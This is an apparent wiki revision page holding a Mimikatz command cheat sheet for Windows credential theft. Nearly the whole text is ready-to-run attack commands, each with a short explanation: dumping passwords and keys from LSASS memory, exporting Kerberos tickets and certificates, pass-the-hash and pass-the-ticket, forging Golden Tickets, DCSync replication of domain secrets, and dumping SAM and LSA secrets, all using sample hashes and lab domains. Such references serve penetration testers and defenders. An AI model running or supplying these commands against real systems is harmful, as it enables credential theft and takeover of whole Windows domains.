Mimikatz: Difference between revisions

From RCATs
No edit summary
No edit summary
Line 92: Line 92:
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
</syntaxhighlight>
</syntaxhighlight>
==ekeys=
==ekeys==
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.

Revision as of 19:05, 25 January 2023

Commands

sekurlsa

# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords 

# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full

# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export 

# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

# This command will list and export Kerberos tickets to a file.
kerberos::list /export

# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi

# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi


crypto

This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi

# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng

# This command is used to export certificates from a Windows system.
crypto::certificates /export 

# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export

# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export

vault & lsadump

Extracts credentials from the Windows Vault.
vault::cred

Lists the contents of the Windows Vault.
vault::list

Elevates the current user's privileges to that of the Local System account.
token::elevate

Reverts the current user's privileges to their previous state before elevation.
token::revert

Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam

Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets

Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache

Perform a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

PTH

# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys

dapi

# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi

minidump

# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp

PTT

#Impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Golden & Silver Tickets

#Create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

tgt

# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt

# Removes TGTs from memory.
kerberos::purge